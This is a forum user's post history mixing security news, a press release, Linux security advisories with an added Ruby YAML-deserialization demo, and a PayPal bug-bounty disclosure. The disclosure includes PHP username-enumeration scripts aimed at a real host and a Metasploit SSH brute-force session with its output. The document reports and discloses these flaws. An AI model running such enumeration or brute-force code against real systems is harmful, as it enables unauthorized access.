Everything posted by Matt (1773 posts, 6 days won)
As a response to the wave of infected extensions, or extensions that pose a serious threat to the online privacy of Google Chrome users, Google has introduced scanning of extensions and of the other items available in the Chrome Web Store. As a result, adding a new item to the store will take up to an hour, during which it is scanned for malware. Source: https://plus.google.com/+GoogleChromeDevelopers/posts/3kpAu4VcP5E
-
I may be talking nonsense. Check whether it is some kind of network virus. Make yourself a new DVD with a Windows on someone else's PC. Go to your PC, unplug the internet cable and install Windows with the cable unplugged. Then, after you finish, install an antivirus (e.g. Avast) and see how things are after that. That's what I would do in your place.
-
How to Boot an Ubuntu ISO from Your Hard Drive - wikiHow. There is also a video. I hope it helps you. Good luck.
-
h05th: I read your first post and then only skimmed through the topic. Isn't the simplest solution to format the whole hard drive?? I see you're struggling; format it, then install a properly licensed antivirus and you won't have any more problems. Again, I haven't read the whole topic. //EDIT: OK, I've read the whole topic. I have never run into such problems, but I also ran with 1 GB of RAM on a very old PC. I could use Microsoft Essentials, which is not the best antivirus either, but you certainly won't pick up a backdoor or whatever it is you have.
-
The latest threat for Android devices, Obad, is a backdoor-type trojan that pretends to be a useful application and, once installed, lets attackers access your data at any time. Obad downloads other infected applications and grants them "Device administrator" rights, but hidden from the operating system. Being invisible in the "device admin" section, they cannot be uninstalled. This is where the new program from McAfee comes in: it detects any application that has taken device administrator rights on your device in an invisible way. The program helps you deactivate them and delete them from your phone or tablet, and so you can get rid of the problems. Download the new McAfee Security Innovations program from here and benefit from the new feature: https://play.google.com/store/apps/details?id=com.mcafee.mmi Source FaraVirusi.Com
-
In May, the share of spam in email traffic fell by 2.5 percentage points to an average of 69.7%. Kaspersky Lab experts observed a slight increase in the number of phishing emails compared to April, while 2.8% of emails, 0.4 percentage points more than the previous month, contained malicious attachments. In an attempt to convince users to open these attachments, spammers imitated genuine notifications from companies providing internet or logistics services, such as Amazon, UPS or Western Union. The most tempting tools for phishers remained social networks. Most spam messages came from two countries: China (21.4%) and the United States (16.3%). South Korea is third in the ranking, with a 12% contribution in May. Spammers continued to take advantage of US national holidays, Mother's Day and Memorial Day, to promote various products and services. After Valentine's Day, Mother's Day was second in the ranking of the busiest days for spam messages with offers from florists, which rose significantly ahead of the holiday. Kaspersky Lab experts warn that spam messages of this kind are not just a harmless inconvenience: users' personal information, including bank details, can become the main target of spammers. For example, in May several phishing messages were sent that appeared to be emails from Microsoft support services, aimed at stealing personal information. The messages, which at first sight appear to have been sent from the microsoft.com domain, claimed that the registrations of "Microsoft Window" users were about to be suspended because updates had not been installed, updates which were said to have been sent in earlier messages.
Recipients were told to immediately follow a link in the email to avoid interruption of service. Users who were fooled ended up on a phishing site created specifically to steal personal information. Other waves of mass mailings contained false notifications about prizes in a non-existent lottery, apparently organized by Microsoft. In some messages, the scammers sent notifications about supposed winnings and asked recipients to contact them for further information, while others promised very large sums of money in exchange for paying fees to administer the winnings. As the holiday season begins, the experts anticipate an increase in the number of notifications that appear to be sent by well-known companies. "We advise you to be cautious when you receive notifications from any type of service," warns Darya Gudkova, Head of Content Analysis & Research at Kaspersky Lab. "Remember that official emails never ask customers to register or send personal or bank account information via links in the body of the message, and never threaten to block accounts. Never follow a link if your antivirus program or browser has blocked it. Be very careful with links in messages. If a link leads to an unofficial website, or if the text of the email shows the official website address while the links lead to another page, you may be dealing with a phishing attempt. If you have any doubt about the authenticity of an email, contact the support service of the organization that appears to have sent it to check whether it really sent the messages," explained Darya Gudkova. The full version of the May 2013 spam report is available on securelist.com. Source FaraVirusi.Com
-
France, Italy and Greece were among the 38 "targets" monitored by the US National Security Agency (NSA), according to documents passed to the British newspaper The Guardian by the agency's former contractor Edward Snowden. One of the NSA documents reveals that the agency's electronic espionage activities targeted embassies in Washington and those countries' missions to the UN, The Guardian reveals in its online edition, according to AFP. Eavesdropping attempts targeted the embassies of France, Italy and Greece in Washington. Japan, Mexico, South Korea, India and Turkey were also listed among the targets of electronic surveillance operations in a document dating from 2010. The German weekly Der Spiegel had written earlier, on Saturday, based on documents provided by Edward Snowden, that the NSA, accused of spying on electronic communications worldwide through the PRISM program, had targeted the offices of EU institutions in Brussels and the EU's embassy in Washington. The EU delegation to the UN was subject to similar surveillance, according to Der Spiegel. What the American cyber-spies were after: the espionage involved not only microphones installed in the building but also an infiltration of the computer network, allowing them to read emails and internal documents. According to the confidential documents cited by the German magazine, the Europeans are explicitly designated as "targets to attack". According to the documents consulted by The Guardian, the operation targeting the EU aimed to learn more about disagreements between EU member states. The surveillance operation against the French mission to the UN was named "BLACKFOOT", and the one targeting the French embassy in Washington "WABASH". The Italian embassy in Washington was targeted by an operation codenamed "BRUNEAU". The EU, France and Germany on Sunday demanded explanations regarding these allegations of spying on the EU.
Source Business24.Ro
-
Endava, one of the leading IT services companies in the region, headquartered in London with development centres in Romania, in Cluj-Napoca, Iasi and Bucharest, has been shortlisted in the top three companies for the quality of the IT support services it provides in the IT Service Excellence Awards 2013 ranking, in the Best Managed Service Desk category, compiled by the Service Desk Institute, one of the most prestigious professional associations in the field of IT services in Europe. The ranking position attests to the innovative approach to managing the Service Desk team and to a high level of excellence and professionalism in the services provided. This result in the SDI ranking, now in its 19th edition, is one of the most coveted distinctions for companies in the IT support services industry in Europe. "In recent years, the Service Desk team has grown both in headcount and in the value of its activity, so that it is now the first point of contact for an increasingly wide range of customers with more numerous and more specific requirements. Our investments in professional development through Endava University, in customer satisfaction programmes, and our ongoing investments in service quality management systems allow us to deliver support services at the level our customers require," said John Cotterell, CEO of Endava, on this occasion. Endava's Service Desk team is part of the company's Managed Services division, which currently contributes over 11 million pounds sterling to Endava's annual turnover. The Service Desk team was formed in 2007 in Cluj-Napoca, currently numbers over 30 analysts and provides the necessary support to companies of various sizes, delivering level 1 support services and resolving requests from the users of those companies' IT systems.
Each month, the members of the Service Desk team answer approximately 7,500 requests, resolving on average 80% of them directly, while the remaining 20% of requests are routed to the level 2 and 3 support teams. In the last year, Endava has won new projects within the Managed Services department, while revenues and requests for Service Desk services have grown by over 25%, and the customer satisfaction level exceeds 90%. "In the next 6 months we intend to grow the Service Desk team in Cluj to at least 50 analysts, to respond to the growing number of customers, and in addition we will continue to hire support engineers and IT consultants, so that we soon exceed the threshold of 100 employees in the Managed Services division in Romania. More than half of the Service Desk analysts have been promoted, in the last 18 months, to positions of Service Delivery Manager, team leader, project manager or level 2 support engineer," explained Andrei Pantelimon, CEE Operations Manager in Endava's Managed Services division. Endava's Service Desk team interacts with a larger number of customers than any other department of the company. Alexander Mann Solutions, a recruitment company with global operations, is one of Endava's key customers; it recently implemented an IT system transition programme designed by Endava, through which Alexander Mann Solutions employees can access IT services from anywhere and from any device, with every use able to be monitored. "With Endava's help, we now use a state-of-the-art, highly efficient cloud IT infrastructure, which reduces IT system costs. Endava's services have also enabled a significant improvement in the level of support services, and the feedback from our employees across all our international locations is extremely favourable.
At present, through the services provided by Endava, we achieve a resolution rate of over 80% for IT requests at the first contact with the support team," said John Wainwright, Head of IT Global & Facilities, Alexander Mann Solutions. Further details and the list of this year's finalist companies are available at: Winners 2013 | SDI. About Endava: Endava is a privately held IT services company founded in 2000. Endava has 8 offices in the United Kingdom, the United States, Romania and the Republic of Moldova and an annual turnover of over 29.8 million pounds sterling / 37 million euros. Endava delivers business solutions and IT services mainly for large organizations in the banking, financial, telecommunications, media, sports & entertainment and professional services sectors. Endava specializes in delivering services such as: Software Development, Digital Media, Software Testing, Software Application Management, Cloud Services. Source: totalPR public relations / Public relations agency | totalPR
-
Description: Mandriva Linux Security Advisory 2013-186 - Updated puppet packages fix remote code execution vulnerability. When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload.
Author: Mandriva
Source: Mandriva Linux Security Advisory 2013-186 ≈ Packet Storm
Code:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2013:186
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : puppet
Date    : June 28, 2013
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Updated puppet packages fix remote code execution vulnerability

When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload (CVE-2013-3567).
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3567
http://advisories.mageia.org/MGASA-2013-0187.html
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
1532146f04c77b3a71e01bbbaa929d2c  mbs1/x86_64/puppet-2.7.22-1.mbs1.noarch.rpm
e6b6a20c32faea8808d83364b96236ae  mbs1/x86_64/puppet-server-2.7.22-1.mbs1.noarch.rpm
713d5666406f8bdf86f0e7bd6bf54bfa  mbs1/SRPMS/puppet-2.7.22-1.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRzVQFmqjQ0CJFipgRAmR6AJ0euIEDVy8e9FKN6zUjkZepG0SGuQCfTyUM
uT8v/zkgEMTfhKoDVS4hLTg=
=lnWK
-----END PGP SIGNATURE-----
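The flaw the advisory describes, "construct an instance of any class available in the ruby process", shown as an added Ruby example beside its fix pattern. This is not Puppet's or Mandriva's code: the class `AuditedAction`, the YAML document and both loader functions are constructed for illustration. The unrestricted loader honours the `!ruby/object:` tag and builds whatever class the document names, populating its instance variables from attacker-controlled input; `Psych.safe_load` admits only plain data types and rejects the same document, which is the mitigation for this class of bug when the YAML comes from an untrusted client.

```ruby
require 'yaml'

# Added example (not Puppet's or Mandriva's code). AuditedAction is a constructed
# stand-in for "any class available in the ruby process"; nothing here runs the
# command it carries, the point is that the loader builds the object at all.
class AuditedAction
  attr_reader :command

  def initialize(command = nil)
    @command = command
  end
end

# Constructed payload: the !ruby/object tag names the class to instantiate and the
# mapping below it becomes that object's instance variables (initialize is never
# called). An unrestricted loader accepts this for any class name.
UNTRUSTED_YAML = <<~YAML
  --- !ruby/object:AuditedAction
  command: id
YAML

# The vulnerable pattern: unrestricted YAML deserialization of client input.
# Psych.unsafe_load exists from Psych 3.3 onwards; on older versions Psych.load
# itself is the unrestricted loader.
def unsafe_deserialize(yaml)
  if Psych.respond_to?(:unsafe_load)
    Psych.unsafe_load(yaml)
  else
    Psych.load(yaml)
  end
end

# The fix pattern: safe_load admits only scalars, arrays and hashes and raises
# Psych::DisallowedClass for any tagged object the caller has not permitted.
def safe_deserialize(yaml)
  Psych.safe_load(yaml)
rescue Psych::DisallowedClass => e
  { rejected: e.message }
end

if __FILE__ == $PROGRAM_NAME
  obj = unsafe_deserialize(UNTRUSTED_YAML)
  puts "unrestricted loader built #{obj.class} with command=#{obj.command.inspect}"
  puts "safe loader result: #{safe_deserialize(UNTRUSTED_YAML).inspect}"
end
```

Run it with `ruby yaml_deserialization.rb` (any filename works). A Puppet master that needs to deserialize structured client data would add only the specific classes it expects via `permitted_classes:` rather than falling back to the unrestricted loader.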
-
Description: Debian Linux Security Advisory 2717-1 - Jon Erickson of iSIGHT Partners Labs discovered a heap overflow in xml-security-c, an implementation of the XML Digital Security specification. The fix to address CVE-2013-2154 introduced the possibility of a heap overflow in the processing of malformed XPointer expressions in the XML Signature Reference processing code, possibly leading to arbitrary code execution.
Author: Debian
Source: Debian Security Advisory 2717-1 ≈ Packet Storm
Code:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2717-1                   security@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
June 28, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xml-security-c
Vulnerability  : heap overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-2210
Debian Bug     : 714241

Jon Erickson of iSIGHT Partners Labs discovered a heap overflow in xml-security-c, an implementation of the XML Digital Security specification. The fix to address CVE-2013-2154 introduced the possibility of a heap overflow in the processing of malformed XPointer expressions in the XML Signature Reference processing code, possibly leading to arbitrary code execution.

For the oldstable distribution (squeeze), this problem has been fixed in version 1.5.1-3+squeeze3.

For the stable distribution (wheezy), this problem has been fixed in version 1.6.1-5+deb7u2.

For the unstable distribution (sid), this problem has been fixed in version 1.6.1-7.

We recommend that you upgrade your xml-security-c packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJRzaDrAAoJEHidbwV/2GP+ypYQAKE0uiu5ldrC60pukEYiU1d8
epTenJbhaYhzb2FxKETjMtLI+46nooId6ptCCWXwwVZ1PfhaaTO6CJkPuk9MJTZa
K8Du0hfa8aNp6Ahp+3/zEEnnwvRVW2EoFB7BHXc1DOY+fmGuSoL1Yty5jwAiOJd3
NjcuJMWcJk8TtYEYH3JsNQiJVliR67YlxgYKnpFKfCtJu/NeVxgFZymz6u6bkeVU
19XZW+xOypFGPi0H3w5sZEd5OZIo7lhettUHg1IJOAVulX3f7Ad1cxOhtns2HJoq
3qpcKm9iMr5aQ0c1qKFWhdiMecrxBd7TOjsPJ1lBpm6j5mT0uKgfTq/oPvh6jLHN
bnhBdV65wkhb13umgGLwxoHDdk0Gd1prTy9i3lAnJrXCptZ3Ye4vIjNfOk7DMnV4
iy4fj+Maky5U1EzdOcst0NkMkk/Nx71QVdwDd5D/6pMVogNDpYm9jHrjkkhrH2Hq
vZ3ja9SnRL8qXK7zPWZ3Ub2CjcJLxtN9p0tK4M9U/4DalIZry0gAASiy3887FS2h
Z9Y1TN8Sga3LMKL2FzYzERlt0wsHpilDqVUcPxBk7p5pA65TjRHIxK9fxoFwownD
yPU+nb70th8vyU9jJH/+sidPau07Zk1sqxS79Ndf1z9YD1/KyMU7lOIkVXH4KNO4
Fa+JknxCcr25IQJXNB31
=fVio
-----END PGP SIGNATURE-----
-
Description: The PayPal Hong Kong marketing site suffers from information disclosure, user enumeration, and bruteforcing vulnerabilities.
Author: Karim H.B
Source: PayPal Enumeration / Information Disclosure ≈ Packet Storm
Code:

Title:
======
PayPal Bug Bounty MKT HK #63 - Multiple Vulnerabilities

Date:
=====
2013-06-26

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=852
PayPal Security UID: EIbecaC

VL-ID:
=====
852

Common Vulnerability Scoring System:
====================================
2.9

Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official PayPal Inc Marketing service application system.

Report-Timeline:
================
2013-02-03: Researcher Notification & Coordination (Karim Boudra)
2013-02-05: Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program)
2013-03-12: Vendor Response/Feedback (PayPal Inc Security Incident Team - Bug Bounty Program)
2013-05-24: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward)
2013-06-26: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
PayPal Inc
Product: Marketing Application & Service (HK) 2013 Q1

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
While analysing the www.paypal-marketing.com.hk server, we identified the following vulnerabilities ...

1) Apache username enumeration

The scope of this vulnerability is to verify if it is possible to collect a set of valid Apache usernames by interacting with an Apache feature. This test will be useful for the SSH brute force testing, in which we verify if, given a valid username, it is possible to find the corresponding password. Often, cPanel reveals when a username exists on Apache, either as a consequence of a misconfiguration or as a design decision. For example, when we request a wrong username, we receive an HTTP response message that states whether the username is present on the system or not. The information obtained can be used by an attacker to gain a list of valid users on Apache. This information can be used to attack the SSH service, for example through a brute force attack using default passwords.

Testing via example

In black box testing, we know nothing about the specific usernames or the error messages on the Apache server. If the Apache server is vulnerable, we receive a response message that reveals, directly or indirectly, some information useful for enumerating users. For example ...

https://www.paypal-marketing.com.hk/~root - we receive from web server: 403 Forbidden
https://www.paypal-marketing.com.hk/~vulnerabilitylab - we receive from web server: 302 Found
https://www.paypal-marketing.com.hk/~operator - we receive from web server: 403 Forbidden

As we can see above, when we provide a username to the Apache server, we see a message indicating that an error has occurred in the URL. In the first case we provided a valid username, in the second an invalid username, in the third a valid username. In the first case the user exists, but we cannot view the web page; in the second case instead the user `vulnerabilitylab` doesn't exist and the server redirects our browser to `https://www.paypal-marketing.com.hk/en/business/merchant-solutions.php`. Collecting this information we can enumerate the users.

Let us analyze the web page titles: We can receive useful information in the title of the web page, where we can obtain a specific error code or messages that reveal if the problems are with the username or the password. For instance, if the requested username doesn't exist, the title is similar to:

Invalid user : we receive <title>302 Forbidden</title>
Valid user : we receive <title>403 Forbidden</title> or <title>200 Forbidden</title>

So after tests, we were able to identify if a given username is valid or not. From the above sample we can create a simple script that uses a username wordlist and submits requests with HTTPS packets to automate a web query to discern valid usernames. To create a script we can also use PHP and openssl.

Other possibilities are:
- usernames associated with credit card numbers, usernames associated with a hidden vulnerable application, or in general numbers with a pattern.
- userIDs associated with real names, e.g. if Freddie Mercury has a username of `fmercury`, then you might guess Roger Taylor to have the userID of `rtaylor`.

Again, we can guess a username from Google information gathering, for example from a specific domain. Google can help to find domain users through specific queries or through a simple shell script or tool.

2) CGI Script Information Leak (Information Disclosure & System usernames enumeration)

The vulnerability is a weakness in a CGI script (frequently a broken or missing control) that enables an attack to succeed, and it is located at:

HOST : https://www.paypal-marketing.com.hk
FILE : /cgi-sys/entropysearch.cgi?user={username}
Vulnerable Parameters : user

The scope of this vulnerability is to enumerate a list of system usernames and to gather information such as the PATH FOLDER for a given username:

https://www.paypal-marketing.com.hk/cgi-sys/entropysearch.cgi?user={username}

As you can see above, if we replace username with a valid username, we get a non-null PATH FOLDER value:

1- in the case where the username is equal to `root`, we receive the following message: Could not chdir into /root/: Permission denied
2- in the case where the username is equal to `operator`, we receive the following message: Could not chdir into /var/spool/mqueue/.htmltemplates: Permission denied
3- in the case where the username doesn't exist, like `vulnerability`: Could not chdir into /.htmltemplates: No such file or directory

It was easy to collect the path folder
- using the regular expression `#Could not chdir into (.*?)/.htmltemplates:#`
- using string splitting (see the POC2)

This exploitation can be used to enumerate a lot of information (system usernames, PATH folder, installed products & services). To exploit this vulnerability, we created a simple script that uses a username wordlist and submits requests with HTTPS packets to automate a web query to discern valid usernames. The test script is coded in PHP and requires openssl.

After execution of our POC2:

root@bt:~/paypalbugbounty/1337l33t# ls
allusernames.txt PATH@POC@Disclosure.txt
root@bt:~/paypalbugbounty/1337l33t# php PATH/@POC/@Disclosure.txt
root:/root
daemon:/sbin
bin:/bin
adm:/var/adm
shutdown:/sbin
sync:/sbin
games:/usr/games
lp:/var/spool/lpd
mail:/var/spool/mail
news:/etc/news
uucp:/var/spool/uucp
sshd:/var/empty/sshd
nobody:/
mysql:/var/lib/mysql
apache:/var/www
pcap:/var/arpwatch
xfs:/etc/X11/fs

Here is the list of collected useful information:

Usernames: root,daemon,bin,adm,shutdown,sync,games,lp,mail,news,uucp,sshd,nobody,mysql,apache,pcap,xfs
Installed products: apache,mysql,x11,arpwatch,sshd

3) SSH SERVER is vulnerable to Bruteforce Threads (Misconfiguration)

SSH (Secure Socket Shell) is a secure remote access protocol. Multiple connection attempts from the same source address to the same destination address in a short amount of time are a sign of a brute force attempt. A remote attacker may be using an automated program to attempt to guess the login credentials and gain access to the victim's system.

The scope of this advisory is to verify if it is possible to collect a set of valid system usernames by interacting with a cPanel feature. This test will be useful for the SSH brute force testing, in which we verify if, given a valid username, it is possible to find the corresponding password. Often, cPanel reveals when a username exists on the system, either as a consequence of a misconfiguration or as a design decision. For example, when we request a wrong username, we receive an HTTP response message that states whether the username is present on the system or not. The information obtained can be used by an attacker to gain a list of valid users on the system. This information can be used to attack the SSH service, for example through a brute force attack using default passwords.
Proof of Concept: ================= 1) POC for Apache username enumeration <?php error_reporting(0); // Paypal Apache username ennumeration on HTTPS://www.paypal-marketing.com.hk with SSH enabled // Require activation of openssl module on php.ini $HOST="www.paypal-marketing.com.hk"; $PARENTPATH="/~"; $list=file("allusernames.txt"); foreach ($list as $user) { $user=trim($user); $PATH=$PARENTPATH.$user; $data=user_exist($user); if (@preg_match("#403 Forbidden#", $data) or @preg_match("#200 Found#", $data)) { echo "[".$user."] - Account Found \n"; } } function user_exist($username){ $result=Connect(); return $result; } function Connect(){ global $PATH,$HOST; $fp = fsockopen("ssl://".$HOST,443,$errno,$errstr,30); $resultat=""; if(!$fp) {die("Error cnx");} else { $out = "GET ".$PATH." HTTP/1.1\r\n"; $out .= "Host: ".$HOST."\r\n"; $out .="User-Agent=:Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\r\n"; $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; //fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); //fputs($fp, "Content-length: ".strlen($postdata)."\r\n"); $out.="Connection: close\r\n\r\n"; //if(isset($COOKIES)){$out.="Cookie: $cookies\r\n";} //fputs($fp, $postdata."\r\n\r\n"); fwrite($fp, $out); while(!feof($fp)) $resultat .= fgets($fp,4096); fclose($fp); } return $resultat; } ?> 2) POC CGI Script Information Leak (Information Disclosure & System usernames enumeration). 
<?php error_reporting(0); // Paypal user ennumeration on https://www.paypal-marketing.com.hk/cgi-sys/entropysearch.cgi?user=root // require activation of openssl module on php.ini $HOST="www.paypal-marketing.com.hk"; $PARENTPATH="/cgi-sys/entropysearch.cgi?user="; $list=file("allusernames.txt"); foreach ($list as $user) { $PATH= $PARENTPATH.trim($user); $data=user_exist($user); $data=explode('Could not chdir into ',$data); $data=explode('/.htmltemplates',$data[1]); $data=$data[0]; if($data != null){ echo trim($user).":".$data."\n"; } } function user_exist($username){ $result=Connect(); return $result; } function Connect(){ global $PATH,$HOST; $fp = fsockopen("ssl://".$HOST,443,$errno,$errstr,30); $resultat=""; if(!$fp) {die("Error cnx");} else { $out = "GET ".$PATH." HTTP/1.1\r\n"; $out .= "Host: ".$HOST."\r\n"; $out .="User-Agent=:Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24\r\n"; $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; //fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); //fputs($fp, "Content-length: ".strlen($postdata)."\r\n"); $out.="Connection: close\r\n\r\n"; //if(isset($COOKIES)){$out.="Cookie: $cookies\r\n";} //fputs($fp, $postdata."\r\n\r\n"); fwrite($fp, $out); while(!feof($fp)) $resultat .= fgets($fp,4096); fclose($fp); } return $resultat; } ?> 3) In order to automate our SSH attempts we used a framework against the ssh_login module We defined: "ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/computer/common-passwords.txt.gz" as Password wordlist "paypalusers.txt" (contains enumerated usernames from the first vulnerability) as username wordlist in order to optimize our SSH bruteforce attack ... 
zer0pool > use auxiliary/scanner/ssh/ssh_login
zer0pool auxiliary(ssh_login) > set THREADS 24
THREADS => 24
zer0pool auxiliary(ssh_login) > set RPORT 22
RPORT => 22
zer0pool auxiliary(ssh_login) > set VERBOSE 1
VERBOSE => 1
zer0pool auxiliary(ssh_login) > set USER_AS_PASS 1
USER_AS_PASS => 1
zer0pool auxiliary(ssh_login) > set STOP_ON_SUCCESS 0
STOP_ON_SUCCESS => 0
zer0pool auxiliary(ssh_login) > set BRUTEFORCE_SPEED 5
BRUTEFORCE_SPEED => 5
zer0pool auxiliary(ssh_login) > set PASS_FILE /pentest/passwords/wordlists/common-passwords.txt
PASS_FILE => /pentest/passwords/wordlists/common-passwords.txt
zer0pool auxiliary(ssh_login) > set USER_FILE /root/paypalusers.txt
USER_FILE => /root/paypalusers.txt
zer0pool auxiliary(ssh_login) > set RHOSTS www.paypal-marketing.com.hk
RHOSTS => www.paypal-marketing.com.hk
zer0pool auxiliary(ssh_login) > set BLANK_PASSWORDS 1
BLANK_PASSWORDS => 1
zer0pool auxiliary(ssh_login) > run -j
[*] Auxiliary module running as background job
[*] 122.201.98.21:22 SSH - Starting bruteforce
[*] 122.201.98.21:22 SSH - [0001/2449] - Trying: username: 'root' with password: ''
[-] 122.201.98.21:22 SSH - [0001/2449] - Failed: 'root':''
[*] 122.201.98.21:22 SSH - [0002/2449] - Trying: username: 'operator' with password: ''
[-] 122.201.98.21:22 SSH - [0002/2449] - Failed: 'operator':''
[*] 122.201.98.21:22 SSH - [0003/2449] - Trying: username: 'mailnull' with password: ''
[-] 122.201.98.21:22 SSH - [0003/2449] - Failed: 'mailnull':''
[*] 122.201.98.21:22 SSH - [0004/2449] - Trying: username: 'root' with password: 'root'
[-] 122.201.98.21:22 SSH - [0004/2449] - Failed: 'root':'root'
[*] 122.201.98.21:22 SSH - [0005/2449] - Trying: username: 'operator' with password: 'operator'

After some thousand attempts, we noticed that the SSH server had no restriction for blocking our brute force attempts. We also know that after the attack, access without SSH keys should be possible.
Solution:
=========
2013-05-24: Vendor Fix/Patch (PayPal Inc Developer Team - Bug Bounty Program Reward)

Risk:
=====
The security risk of the 2 discovered vulnerabilities and 1 misconfiguration is estimated as medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Karim Boudra (kami@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
